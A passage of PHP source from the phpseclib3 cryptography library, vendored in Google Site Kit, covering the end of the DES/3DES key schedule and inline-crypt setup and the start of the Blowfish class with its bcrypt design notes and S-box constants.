0x11001408, 0x10001108, 0x10001508, 0x11001108, 0x11001508, 0x10001108, 0x10001508, 0x11001108, 0x11001508, 0x81008, 0x81408, 0x1081008, 0x1081408, 0x81008, 0x81408, 0x1081008, 0x1081408, 0x81108, 0x81508, 0x1081108, 0x1081508, 0x81108, 0x81508, 0x1081108, 0x1081508, 0x10081008, 0x10081408, 0x11081008, 0x11081408, 0x10081008, 0x10081408, 0x11081008, 0x11081408, 0x10081108, 0x10081508, 0x11081108, 0x11081508, 0x10081108, 0x10081508, 0x11081108, 0x11081508]; $keys = []; for ($des_round = 0; $des_round < $this->des_rounds; ++$des_round) { // pad the key and remove extra characters as appropriate. $key = \str_pad(\substr($this->key, $des_round * 8, 8), 8, "\x00"); // Perform the PC/1 transformation and compute C and D. $t = \unpack('Nl/Nr', $key); list($l, $r) = [$t['l'], $t['r']]; $key = self::$shuffle[$pc1map[$r & 0xff]] & "\x80\x80\x80\x80\x80\x80\x80\x00" | self::$shuffle[$pc1map[$r >> 8 & 0xff]] & "@@@@@@@\x00" | self::$shuffle[$pc1map[$r >> 16 & 0xff]] & " \x00" | self::$shuffle[$pc1map[$r >> 24 & 0xff]] & "\x10\x10\x10\x10\x10\x10\x10\x00" | self::$shuffle[$pc1map[$l & 0xff]] & "\x08\x08\x08\x08\x08\x08\x08\x00" | self::$shuffle[$pc1map[$l >> 8 & 0xff]] & "\x04\x04\x04\x04\x04\x04\x04\x00" | self::$shuffle[$pc1map[$l >> 16 & 0xff]] & "\x02\x02\x02\x02\x02\x02\x02\x00" | self::$shuffle[$pc1map[$l >> 24 & 0xff]] & "\x01\x01\x01\x01\x01\x01\x01\x00"; $key = \unpack('Nc/Nd', $key); $c = $key['c'] >> 4 & 0xfffffff; $d = $key['d'] >> 4 & 0xffffff0 | $key['c'] & 0xf; $keys[$des_round] = [self::ENCRYPT => [], self::DECRYPT => \array_fill(0, 32, 0)]; for ($i = 0, $ki = 31; $i < 16; ++$i, $ki -= 2) { $c <<= $shifts[$i]; $c = ($c | $c >> 28) & 0xfffffff; $d <<= $shifts[$i]; $d = ($d | $d >> 28) & 0xfffffff; // Perform the PC-2 transformation. $cp = $pc2mapc1[$c >> 24] | $pc2mapc2[$c >> 16 & 0xff] | $pc2mapc3[$c >> 8 & 0xff] | $pc2mapc4[$c & 0xff]; $dp = $pc2mapd1[$d >> 24] | $pc2mapd2[$d >> 16 & 0xff] | $pc2mapd3[$d >> 8 & 0xff] | $pc2mapd4[$d & 0xff]; // Reorder: odd bytes/even bytes. Push the result in key schedule. $val1 = $cp & \intval(0xff000000) | $cp << 8 & 0xff0000 | $dp >> 16 & 0xff00 | $dp >> 8 & 0xff; $val2 = $cp << 8 & \intval(0xff000000) | $cp << 16 & 0xff0000 | $dp >> 8 & 0xff00 | $dp & 0xff; $keys[$des_round][self::ENCRYPT][] = $val1; $keys[$des_round][self::DECRYPT][$ki - 1] = $val1; $keys[$des_round][self::ENCRYPT][] = $val2; $keys[$des_round][self::DECRYPT][$ki] = $val2; } } switch ($this->des_rounds) { case 3: // 3DES keys $this->keys = [self::ENCRYPT => \array_merge($keys[0][self::ENCRYPT], $keys[1][self::DECRYPT], $keys[2][self::ENCRYPT]), self::DECRYPT => \array_merge($keys[2][self::DECRYPT], $keys[1][self::ENCRYPT], $keys[0][self::DECRYPT])]; break; // case 1: // DES keys default: $this->keys = [self::ENCRYPT => $keys[0][self::ENCRYPT], self::DECRYPT => $keys[0][self::DECRYPT]]; } } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { // Engine configuration for: // - DES ($des_rounds == 1) or // - 3DES ($des_rounds == 3) $des_rounds = $this->des_rounds; $init_crypt = 'static $sbox1, $sbox2, $sbox3, $sbox4, $sbox5, $sbox6, $sbox7, $sbox8, $shuffleip, $shuffleinvip; if (!$sbox1) { $sbox1 = array_map("intval", self::$sbox1); $sbox2 = array_map("intval", self::$sbox2); $sbox3 = array_map("intval", self::$sbox3); $sbox4 = array_map("intval", self::$sbox4); $sbox5 = array_map("intval", self::$sbox5); $sbox6 = array_map("intval", self::$sbox6); $sbox7 = array_map("intval", self::$sbox7); $sbox8 = array_map("intval", self::$sbox8);' . ' for ($i = 0; $i < 256; ++$i) { $shuffleip[] = self::$shuffle[self::$ipmap[$i]]; $shuffleinvip[] = self::$shuffle[self::$invipmap[$i]]; } } '; $k = [self::ENCRYPT => $this->keys[self::ENCRYPT], self::DECRYPT => $this->keys[self::DECRYPT]]; $init_encrypt = ''; $init_decrypt = ''; // Creating code for en- and decryption. $crypt_block = []; foreach ([self::ENCRYPT, self::DECRYPT] as $c) { /* Do the initial IP permutation. */ $crypt_block[$c] = ' $in = unpack("N*", $in); $l = $in[1]; $r = $in[2]; $in = unpack("N*", ($shuffleip[ $r & 0xFF] & "\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80") | ($shuffleip[($r >> 8) & 0xFF] & "\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40") | ($shuffleip[($r >> 16) & 0xFF] & "\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20") | ($shuffleip[($r >> 24) & 0xFF] & "\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10") | ($shuffleip[ $l & 0xFF] & "\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08") | ($shuffleip[($l >> 8) & 0xFF] & "\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04") | ($shuffleip[($l >> 16) & 0xFF] & "\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02") | ($shuffleip[($l >> 24) & 0xFF] & "\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01") ); ' . ' $l = $in[1]; $r = $in[2]; '; $l = '$l'; $r = '$r'; // Perform DES or 3DES. for ($ki = -1, $des_round = 0; $des_round < $des_rounds; ++$des_round) { // Perform the 16 steps. for ($i = 0; $i < 16; ++$i) { // start of "the Feistel (F) function" - see the following URL: // http://en.wikipedia.org/wiki/Image:Data_Encryption_Standard_InfoBox_Diagram.png // Merge key schedule. $crypt_block[$c] .= ' $b1 = ((' . $r . ' >> 3) & 0x1FFFFFFF) ^ (' . $r . ' << 29) ^ ' . $k[$c][++$ki] . '; $b2 = ((' . $r . ' >> 31) & 0x00000001) ^ (' . $r . ' << 1) ^ ' . $k[$c][++$ki] . ';' . $l . ' = $sbox1[($b1 >> 24) & 0x3F] ^ $sbox2[($b2 >> 24) & 0x3F] ^ $sbox3[($b1 >> 16) & 0x3F] ^ $sbox4[($b2 >> 16) & 0x3F] ^ $sbox5[($b1 >> 8) & 0x3F] ^ $sbox6[($b2 >> 8) & 0x3F] ^ $sbox7[ $b1 & 0x3F] ^ $sbox8[ $b2 & 0x3F] ^ ' . $l . '; '; // end of "the Feistel (F) function" // swap L & R list($l, $r) = [$r, $l]; } list($l, $r) = [$r, $l]; } // Perform the inverse IP permutation. $crypt_block[$c] .= '$in = ($shuffleinvip[($l >> 24) & 0xFF] & "\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80") | ($shuffleinvip[($r >> 24) & 0xFF] & "\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40") | ($shuffleinvip[($l >> 16) & 0xFF] & "\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20") | ($shuffleinvip[($r >> 16) & 0xFF] & "\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10") | ($shuffleinvip[($l >> 8) & 0xFF] & "\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08") | ($shuffleinvip[($r >> 8) & 0xFF] & "\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04") | ($shuffleinvip[ $l & 0xFF] & "\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02") | ($shuffleinvip[ $r & 0xFF] & "\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01"); '; } // Creates the inline-crypt function $this->inline_crypt = $this->createInlineCryptFunction(['init_crypt' => $init_crypt, 'init_encrypt' => $init_encrypt, 'init_decrypt' => $init_decrypt, 'encrypt_block' => $crypt_block[self::ENCRYPT], 'decrypt_block' => $crypt_block[self::DECRYPT]]); } } <?php /** * Pure-PHP implementation of Blowfish. * * Uses mcrypt, if available, and an internal implementation, otherwise. * * PHP version 5 * * Useful resources are as follows: * * - {@link http://en.wikipedia.org/wiki/Blowfish_(cipher) Wikipedia description of Blowfish} * * # An overview of bcrypt vs Blowfish * * OpenSSH private keys use a customized version of bcrypt. Specifically, instead of * encrypting OrpheanBeholderScryDoubt 64 times OpenSSH's bcrypt variant encrypts * OxychromaticBlowfishSwatDynamite 64 times. so we can't use crypt(). * * bcrypt is basically Blowfish but instead of performing the key expansion once it performs * the expansion 129 times for each round, with the first key expansion interleaving the salt * and password. This renders OpenSSL unusable and forces us to use a pure-PHP implementation * of blowfish. * * # phpseclib's four different _encryptBlock() implementations * * When using Blowfish as an encryption algorithm, _encryptBlock() is called 9 + 512 + * (the number of blocks in the plaintext) times. * * Each of the first 9 calls to _encryptBlock() modify the P-array. Each of the next 512 * calls modify the S-boxes. The remaining _encryptBlock() calls operate on the plaintext to * produce the ciphertext. In the pure-PHP implementation of Blowfish these remaining * _encryptBlock() calls are highly optimized through the use of eval(). Among other things, * P-array lookups are eliminated by hard-coding the key-dependent P-array values, and thus we * have explained 2 of the 4 different _encryptBlock() implementations. * * With bcrypt things are a bit different. _encryptBlock() is called 1,079,296 times, * assuming 16 rounds (which is what OpenSSH's bcrypt defaults to). The eval()-optimized * _encryptBlock() isn't as beneficial because the P-array values are not constant. Well, they * are constant, but only for, at most, 777 _encryptBlock() calls, which is equivalent to ~6KB * of data. The average length of back to back _encryptBlock() calls with a fixed P-array is * 514.12, which is ~4KB of data. Creating an eval()-optimized _encryptBlock() has an upfront * cost, which is CPU dependent and is probably not going to be worth it for just ~4KB of * data. Conseqeuently, bcrypt does not benefit from the eval()-optimized _encryptBlock(). * * The regular _encryptBlock() does unpack() and pack() on every call, as well, and that can * begin to add up after one million function calls. * * In theory, one might think that it might be beneficial to rewrite all block ciphers so * that, instead of passing strings to _encryptBlock(), you convert the string to an array of * integers and then pass successive subarrays of that array to _encryptBlock. This, however, * kills PHP's memory use. Like let's say you have a 1MB long string. After doing * $in = str_repeat('a', 1024 * 1024); PHP's memory utilization jumps up by ~1MB. After doing * $blocks = str_split($in, 4); it jumps up by an additional ~16MB. After * $blocks = array_map(fn($x) => unpack('N*', $x), $blocks); it jumps up by an additional * ~90MB, yielding a 106x increase in memory usage. Consequently, it bcrypt calls a different * _encryptBlock() then the regular Blowfish does. That said, the Blowfish _encryptBlock() is * basically just a thin wrapper around the bcrypt _encryptBlock(), so there's that. * * This explains 3 of the 4 _encryptBlock() implementations. the last _encryptBlock() * implementation can best be understood by doing Ctrl + F and searching for where * self::$use_reg_intval is defined. * * # phpseclib's three different _setupKey() implementations * * Every bcrypt round is the equivalent of encrypting 512KB of data. Since OpenSSH uses 16 * rounds by default that's ~8MB of data that's essentially being encrypted whenever * you use bcrypt. That's a lot of data, however, bcrypt operates within tighter constraints * than regular Blowfish, so we can use that to our advantage. In particular, whereas Blowfish * supports variable length keys, in bcrypt, the initial "key" is the sha512 hash of the * password. sha512 hashes are 512 bits or 64 bytes long and thus the bcrypt keys are of a * fixed length whereas Blowfish keys are not of a fixed length. * * bcrypt actually has two different key expansion steps. The first one (expandstate) is * constantly XOR'ing every _encryptBlock() parameter against the salt prior _encryptBlock()'s * being called. The second one (expand0state) is more similar to Blowfish's _setupKey() * but it can still use the fixed length key optimization discussed above and can do away with * the pack() / unpack() calls. * * I suppose _setupKey() could be made to be a thin wrapper around expandstate() but idk it's * just a lot of work for very marginal benefits as _setupKey() is only called once for * regular Blowfish vs the 128 times it's called --per round-- with bcrypt. * * # blowfish + bcrypt in the same class * * Altho there's a lot of Blowfish code that bcrypt doesn't re-use, bcrypt does re-use the * initial S-boxes, the initial P-array and the int-only _encryptBlock() implementation. * * # Credit * * phpseclib's bcrypt implementation is based losely off of OpenSSH's implementation: * * https://github.com/openssh/openssh-portable/blob/master/openbsd-compat/bcrypt_pbkdf.c * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $blowfish = new \phpseclib3\Crypt\Blowfish('ctr'); * * $blowfish->setKey('12345678901234567890123456789012'); * * $plaintext = str_repeat('a', 1024); * * echo $blowfish->decrypt($blowfish->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher; /** * Pure-PHP implementation of Blowfish. * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> */ class Blowfish extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher { /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'blowfish'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * The fixed subkeys boxes * * S-Box * * @var array */ private static $sbox = [0xd1310ba6, 0x98dfb5ac, 0x2ffd72db, 0xd01adfb7, 0xb8e1afed, 0x6a267e96, 0xba7c9045, 0xf12c7f99, 0x24a19947, 0xb3916cf7, 0x801f2e2, 0x858efc16, 0x636920d8, 0x71574e69, 0xa458fea3, 0xf4933d7e, 0xd95748f, 0x728eb658, 0x718bcd58, 0x82154aee, 0x7b54a41d, 0xc25a59b5, 0x9c30d539, 0x2af26013, 0xc5d1b023, 0x286085f0, 0xca417918, 0xb8db38ef, 0x8e79dcb0, 0x603a180e, 0x6c9e0e8b, 0xb01e8a3e, 0xd71577c1, 0xbd314b27, 0x78af2fda, 0x55605c60, 0xe65525f3, 0xaa55ab94, 0x57489862, 0x63e81440, 0x55ca396a, 0x2aab10b6, 0xb4cc5c34, 0x1141e8ce, 0xa15486af, 0x7c72e993, 0xb3ee1411, 0x636fbc2a, 0x2ba9c55d, 0x741831f6, 0xce5c3e16, 0x9b87931e, 0xafd6ba33, 0x6c24cf5c, 0x7a325381, 0x28958677, 0x3b8f4898, 0x6b4bb9af, 0xc4bfe81b, 0x66282193, 0x61d809cc, 0xfb21a991, 0x487cac60, 0x5dec8032, 0xef845d5d, 0xe98575b1, 0xdc262302, 0xeb651b88, 0x23893e81, 0xd396acc5, 0xf6d6ff3, 0x83f44239, 0x2e0b4482, 0xa4842004, 0x69c8f04a, 0x9e1f9b5e, 0x21c66842, 0xf6e96c9a, 0x670c9c61, 0xabd388f0, 0x6a51a0d2, 0xd8542f68, 0x960fa728, 0xab5133a3, 0x6eef0b6c, 0x137a3be4, 0xba3bf050, 0x7efb2a98, 0xa1f1651d, 0x39af0176, 0x66ca593e, 0x82430e88, 0x8cee8619, 0x456f9fb4, 0x7d84a5c3, 0x3b8b5ebe, 0xe06f75d8, 0x85c12073, 0x401a449f, 0x56c16aa6, 0x4ed3aa62, 0x363f7706, 0x1bfedf72, 0x429b023d, 0x37d0d724, 0xd00a1248, 0xdb0fead3, 0x49f1c09b, 0x75372c9, 0x80991b7b, 0x25d479d8, 0xf6e8def7, 0xe3fe501a, 0xb6794c3b, 0x976ce0bd, 0x4c006ba, 0xc1a94fb6, 0x409f60c4, 0x5e5c9ec2, 0x196a2463, 0x68fb6faf, 0x3e6c53b5, 0x1339b2eb, 0x3b52ec6f, 0x6dfc511f, 0x9b30952c, 0xcc814544, 0xaf5ebd09, 0xbee3d004, 0xde334afd, 0x660f2807, 0x192e4bb3, 0xc0cba857, 0x45c8740f, 0xd20b5f39, 0xb9d3fbdb, 0x5579c0bd, 0x1a60320a, 0xd6a100c6, 0x402c7279, 0x679f25fe, 0xfb1fa3cc, 0x8ea5e9f8, 0xdb3222f8, 0x3c7516df, 0xfd616b15, 0x2f501ec8, 0xad0552ab, 0x323db5fa, 0xfd238760, 0x53317b48, 0x3e00df82, 0x9e5c57bb, 0xca6f8ca0, 0x1a87562e, 0xdf1769db, 0xd542a8f6, 0x287effc3, 0xac6732c6, 0x8c4f5573, 0x695b27b0, 0xbbca58c8, 0xe1ffa35d, 0xb8f011a0, 0x10fa3d98, 0xfd2183b8, 0x4afcb56c, 0x2dd1d35b, 0x9a53e479, 0xb6f84565, 0xd28e49bc, 0x4bfb9790, 0xe1ddf2da, 0xa4cb7e33, 0x62fb1341, 0xcee4c6e8, 0xef20cada, 0x36774c01, 0xd07e9efe, 0x2bf11fb4, 0x95dbda4d, 0xae909198, 0xeaad8e71, 0x6b93d5a0, 0xd08ed1d0, 0xafc725e0, 0x8e3c5b2f, 0x8e7594b7, 0x8ff6e2fb, 0xf2122b64, 0x8888b812, 0x900df01c, 0x4fad5ea0, 0x688fc31c, 0xd1cff191, 0xb3a8c1ad, 0x2f2f2218, 0xbe0e1777, 0xea752dfe, 0x8b021fa1, 0xe5a0cc0f, 0xb56f74e8, 0x18acf3d6, 0xce89e299, 0xb4a84fe0, 0xfd13e0b7, 0x7cc43b81, 0xd2ada8d9, 0x165fa266, 0x80957705, 0x93cc7314, 0x211a1477, 0xe6ad2065, 0x77b5fa86, 0xc75442f5, 0xfb9d35cf, 0xebcdaf0c, 0x7b3e89a0, 0xd6411bd3, 0xae1e7e49, 0x250e2d, 0x2071b35e, 0x226800bb, 0x57b8e0af, 0x2464369b, 0xf009b91e, 0x5563911d, 0x59dfa6aa, 0x78c14389, 0xd95a537f, 0x207d5ba2, 0x2e5b9c5, 0x83260376, 0x6295cfa9, 0x11c81968, 0x4e734a41, 0xb3472dca, 0x7b14a94a, 0x1b510052, 0x9a532915, 0xd60f573f, 0xbc9bc6e4, 0x2b60a476, 0x81e67400, 0x8ba6fb5, 0x571be91f, 0xf296ec6b, 0x2a0dd915, 0xb6636521, 0xe7b9f9b6, 0xff34052e, 0xc5855664, 0x53b02d5d, 0xa99f8fa1, 0x8ba4799, 0x6e85076a, 0x4b7a70e9, 0xb5b32944, 0xdb75092e, 0xc4192623, 0xad6ea6b0, 0x49a7df7d, 0x9cee60b8, 0x8fedb266, 0xecaa8c71, 0x699a17ff, 0x5664526c, 0xc2b19ee1, 0x193602a5, 0x75094c29, 0xa0591340, 0xe4183a3e, 0x3f54989a, 0x5b429d65, 0x6b8fe4d6, 0x99f73fd6, 0xa1d29c07, 0xefe830f5, 0x4d2d38e6, 0xf0255dc1, 0x4cdd2086, 0x8470eb26, 0x6382e9c6, 0x21ecc5e, 0x9686b3f, 0x3ebaefc9, 0x3c971814, 0x6b6a70a1, 0x687f3584, 0x52a0e286, 0xb79c5305, 0xaa500737, 0x3e07841c, 0x7fdeae5c, 0x8e7d44ec, 0x5716f2b8, 0xb03ada37, 0xf0500c0d, 0xf01c1f04, 0x200b3ff, 0xae0cf51a, 0x3cb574b2, 0x25837a58, 0xdc0921bd, 0xd19113f9, 0x7ca92ff6, 0x94324773, 0x22f54701, 0x3ae5e581, 0x37c2dadc, 0xc8b57634, 0x9af3dda7, 0xa9446146, 0xfd0030e, 0xecc8c73e, 0xa4751e41, 0xe238cd99, 0x3bea0e2f, 0x3280bba1, 0x183eb331, 0x4e548b38, 0x4f6db908, 0x6f420d03, 0xf60a04bf, 0x2cb81290, 0x24977c79, 0x5679b072, 0xbcaf89af, 0xde9a771f, 0xd9930810, 0xb38bae12, 0xdccf3f2e, 0x5512721f, 0x2e6b7124, 0x501adde6, 0x9f84cd87, 0x7a584718, 0x7408da17, 0xbc9f9abc, 0xe94b7d8c, 0xec7aec3a, 0xdb851dfa, 0x63094366, 0xc464c3d2, 0xef1c1847, 0x3215d908, 0xdd433b37, 0x24c2ba16, 0x12a14d43, 0x2a65c451, 0x50940002, 0x133ae4dd, 0x71dff89e, 0x10314e55, 0x81ac77d6, 0x5f11199b, 0x43556f1, 0xd7a3c76b, 0x3c11183b, 0x5924a509, 0xf28fe6ed, 0x97f1fbfa, 0x9ebabf2c, 0x1e153c6e, 0x86e34570, 0xeae96fb1, 0x860e5e0a, 0x5a3e2ab3, 0x771fe71c, 0x4e3d06fa, 0x2965dcb9, 0x99e71d0f, 0x803e89d6, 0x5266c825, 0x2e4cc978, 0x9c10b36a, 0xc6150eba, 0x94e2ea78, 0xa5fc3c53, 0x1e0a2df4, 0xf2f74ea7, 0x361d2b3d, 0x1939260f, 0x19c27960, 0x5223a708, 0xf71312b6, 0xebadfe6e, 0xeac31f66, 0xe3bc4595, 0xa67bc883, 0xb17f37d1, 0x18cff28, 0xc332ddef, 0xbe6c5aa5, 0x65582185, 0x68ab9802, 0xeecea50f, 0xdb2f953b, 0x2aef7dad, 0x5b6e2f84, 0x1521b628, 0x29076170, 0xecdd4775, 0x619f1510, 0x13cca830, 0xeb61bd96, 0x334fe1e, 0xaa0363cf, 0xb5735c90, 0x4c70a239, 0xd59e9e0b, 0xcbaade14, 0xeecc86bc, 0x60622ca7, 0x9cab5cab, 0xb2f3846e, 0x648b1eaf, 0x19bdf0ca, 0xa02369b9, 0x655abb50, 0x40685a32, 0x3c2ab4b3, 0x319ee9d5, 0xc021b8f7, 0x9b540b19, 0x875fa099, 0x95f7997e, 0x623d7da8, 0xf837889a, 0x97e32d77, 0x11ed935f, 0x16681281, 0xe358829, 0xc7e61fd6, 0x96dedfa1, 0x7858ba99, 0x57f584a5, 0x1b227263, 0x9b83c3ff, 0x1ac24696, 0xcdb30aeb, 0x532e3054, 0x8fd948e4, 0x6dbc3128, 0x58ebf2ef, 0x34c6ffea, 0xfe28ed61, 0xee7c3c73, 0x5d4a14d9, 0xe864b7e3, 0x42105d14, 0x203e13e0, 0x45eee2b6, 0xa3aaabea, 0xdb6c4f15, 0xfacb4fd0, 0xc742f442, 0xef6abbb5, 0x654f3b1d, 0x41cd2105, 0xd81e799e, 0x86854dc7, 0xe44b476a, 0x3d816250, 0xcf62a1f2, 0x5b8d2646, 0xfc8883a0, 0xc1c7b6a3, 0x7f1524c3, 0x69cb7492, 0x47848a0b, 0x5692b285, 0x95bbf00, 0xad19489d, 0x1462b174, 0x23820e00, 0x58428d2a, 0xc55f5ea, 0x1dadf43e, 0x233f7061, 0x3372f092, 0x8d937e41, 0xd65fecf1, 0x6c223bdb, 0x7cde3759, 0xcbee7460, 0x4085f2a7, 0xce77326e, 0xa6078084, 0x19f8509e, 0xe8efd855, 0x61d99735, 0xa969a7aa, 0xc50c06c2, 0x5a04abfc, 0x800bcadc, 0x9e447a2e, 0xc3453484, 0xfdd56705, 0xe1e9ec9, 0xdb73dbd3, 0x105588cd, 0x675fda79, 0xe3674340, 0xc5c43465, 0x713e38d8, 0x3d28f89e, 0xf16dff20, 0x153e21e7, 0x8fb03d4a, 0xe6e39f2b, 0xdb83adf7, 0xe93d5a68, 0x948140f7, 0xf64c261c, 0x94692934, 0x411520f7, 0x7602d4f7, 0xbcf46b2e, 0xd4a20068, 0xd4082471, 0x3320f46a, 0x43b7d4b7, 0x500061af, 0x1e39f62e, 0x97244546, 0x14214f74, 0xbf8b8840, 0x4d95fc1d, 0x96b591af, 0x70f4ddd3, 0x66a02f45, 0xbfbc09ec, 0x3bd9785, 0x7fac6dd0, 0x31cb8504, 0x96eb27b3, 0x55fd3941, 0xda2547e6, 0xabca0a9a, 0x28507825, 0x530429f4, 0xa2c86da, 0xe9b66dfb, 0x68dc1462, 0xd7486900, 0x680ec0a4, 0x27a18dee, 0x4f3ffea2, 0xe887ad8c, 0xb58ce006, 0x7af4d6b6, 0xaace1e7c, 0xd3375fec, 0xce78a399, 0x406b2a42, 0x20fe9e35, 0xd9f385b9, 0xee39d7ab, 0x3b124e8b, 0x1dc9faf7, 0x4b6d1856, 0x26a36631, 0xeae397b2, 0x3a6efa74, 0xdd5b4332, 0x6841e7f7, 0xca7820fb, 0xfb0af54e, 0xd8feb397, 0x454056ac, 0xba489527, 0x55533a3a, 0x20838d87, 0xfe6ba9b7, 0xd096954b, 0x55a867bc, 0xa1159a58, 0xcca92963, 0x99e1db33, 0xa62a4a56, 0x3f3125f9, 0x5ef47e1c, 0x9029317c, 0xfdf8e802, 0x4272f70, 0x80bb155c, 0x5282ce3, 0x95c11548, 0xe4c66d22, 0x48c1133f, 0xc70f86dc, 0x7f9c9ee, 0x41041f0f, 0x404779a4, 0x5d886e17, 0x325f51eb, 0xd59bc0d1, 0xf2bcc18f, 0x41113564, 0x257b7834, 0x602a9c60, 0xdff8e8a3, 0x1f636c1b, 0xe12b4c2, 0x2e1329e, 0xaf664fd1, 0xcad18115, 0x6b2395e0, 0x333e92e1, 0x3b240b62, 0xeebeb922, 0x85b2a20e, 0xe6ba0d99, 0xde720c8c, 0x2da2f728, 0xd0127845, 0x95b794fd, 0x647d0862, 0xe7ccf5f0, 0x5449a36f, 0x877d48fa, 0xc39dfd27, 0xf33e8d1e, 0xa476341, 0x992eff74, 0x3a6f6eab, 0xf4f8fd37, 0xa812dc60, 0xa1ebddf8, 0x991be14c, 0xdb6e6b0d, 0xc67b5510, 0x6d672c37, 0x2765d43b, 0xdcd0e804, 0xf1290dc7, 0xcc00ffa3, 0xb5390f92, 0x690fed0b, 0x667b9ffb, 0xcedb7d9c, 0xa091cf0b, 0xd9155ea3, 0xbb132f88, 0x515bad24, 0x7b9479bf, 0x763bd6eb, 0x37392eb3, 0xcc115979, 0x8026e297, 0xf42e312d, 0x6842ada7, 0xc66a2b3b, 0x12754ccc, 0x782ef11c, 0x6a124237, 0xb79251e7, 0x6a1bbe6, 0x4bfb6350, 0x1a6b1018, 0x11caedfa, 0x3d25bdd8, 0xe2e1c3c9, 0x44421659, 0xa121386, 0xd90cec6e, 0xd5abea2a, 0x64af674e, 0xda86a85f, 0xbebfe988, 0x64e4c3fe, 0x9dbc8057, 0xf0f7c086, 0x60787bf8, 0x6003604d, 0xd1fd8346, 0xf6381fb0, 0x7745ae04, 0xd736fccc, 0x83426b33, 0xf01eab71, 0xb0804187, 0x3c005e5f, 0x77a057be, 0xbde8ae24, 0x55464299, 0xbf582e61, 0x4e58f48f, 0xf2ddfda2, 0xf474ef38, 0x8789bdc2, 0x5366f9c3, 0xc8b38e74, 0xb475f255, 0x46fcd9b9, 0x7aeb2661, 0x8b1ddf84, 0x846a0e79, 0x915f95e2, 0x466e598e, 0x20b45770, 0x8cd55591, 0xc902de4c, 0xb90bace1, 0xbb8205d0, 0x11a86248, 0x7574a99e, 0xb77f19b6, 0xe0a9dc09, 0x662d09a1, 0xc4324633, 0xe85a1f02, 0x9f0be8c, 0x4a99a025, 0x1d6efe10, 0x1ab93d1d, 0xba5a4df, 0xa186f20f, 0x2868f169, 0xdcb7da83, 0x573906fe, 0xa1e2ce9b, 0x4fcd7f52, 0x50115e01, 0xa70683fa, 0xa002b5c4, 0xde6d027, 0x9af88c27, 0x773f8641, 0xc3604c06, 0x61a806b5, 0xf0177a28, 0xc0f586e0, 0x6058aa, 0x30dc7d62, 0x11e69ed7, 0x2338ea63, 0x53c2dd94, 0xc2c21634, 0xbbcbee56, 0x90bcb6de, 0xebfc7da1, 0xce591d76, 0x6f05e409, 0x4b7c0188, 0x39720a3d, 0x7c927c24, 0x86e3725f, 0x724d9db9, 0x1ac15bb4, 0xd39eb8fc, 0xed545578, 0x8fca5b5, 0xd83d7cd3, 0x4dad0fc4, 0x1e50ef5e, 0xb161e6f8, 0xa28514d9, 0x6c51133c, 0x6fd5c7e7, 0x56e14ec4, 0x362abfce, 0xddc6c837, 0xd79a3234, 0x92638212, 0x670efa8e, 0x406000e0, 0x3a39ce37, 0xd3faf5cf, 0xabc27737, 0x5ac52d1b, 0x5cb0679e, 0x4fa33742, 0xd3822740, 0x99bc9bbe, 0xd5118e9d, 0xbf0f7315, 0xd62d1c7e, 0xc700c47b, 0xb78c1b6b, 0x21a19045, 0xb26eb1be, 0x6a366eb4, 0x5748ab2f, 0xbc946e79, 0xc6a376d2, 0x6549c2c8, 0x530ff8ee, 0x468dde7d, 0xd5730a1d, 0x4cd04dc6, 0x2939bbdb, 0xa9ba4650, 0xac9526e8, 0xbe5ee304, 0xa1fad5f0, 0x6a2d519a, 0x63ef8ce2, 0x9a86ee22, 0xc089c2b8, 0x43242ef6, 0xa51e03aa, 0x9cf2d0a4, 0x83c061ba, 0x9be96a4d, 0x8fe51550, 0xba645bd6, 0x2826a2f9, 0xa73a3ae1, 0x4ba99586, 0xef5562e9, 0xc72fefd3, 0xf752f7da, 0x3f046f69, 0x77fa0a59, 0x80e4a915, 0x87b08601, 0x9b09e6ad, 0x3b3ee593, 0xe990fd5a, 0x9e34d797, 0x2cf0b7d9, 0x22b8b51, 0x96d5ac3a, 0x17da67d, 0xd1cf3ed6, 0x7c7d2d28, 0x1f9f25cf, 0xadf2b89b, 0x5ad6b472, 0x5a88f54c, 0xe029ac71, 0xe019a5e6, 0x47b0acfd, 0xed93fa9b, 0xe8d3c48d, 0x283b57cc, 0xf8d56629, 0x79132e28, 0x785f0191, 0xed756055, 0xf7960e44, 0xe3d35e8c, 0x15056dd4, 0x88f46dba, 0x3a16125, 0x564f0bd, 0xc3eb9e15, 0x3c9057a2, 0x97271aec, 0xa93a072a, 0x1b3f6d9b, 0x1e6321f5, 0xf59c66fb, 0x26dcf319, 0x7533d928, 0xb155fdf5, 0x3563482, 0x8aba3cbb, 0x28517711, 0xc20ad9f8, 0xabcc5167, 0xccad925f, 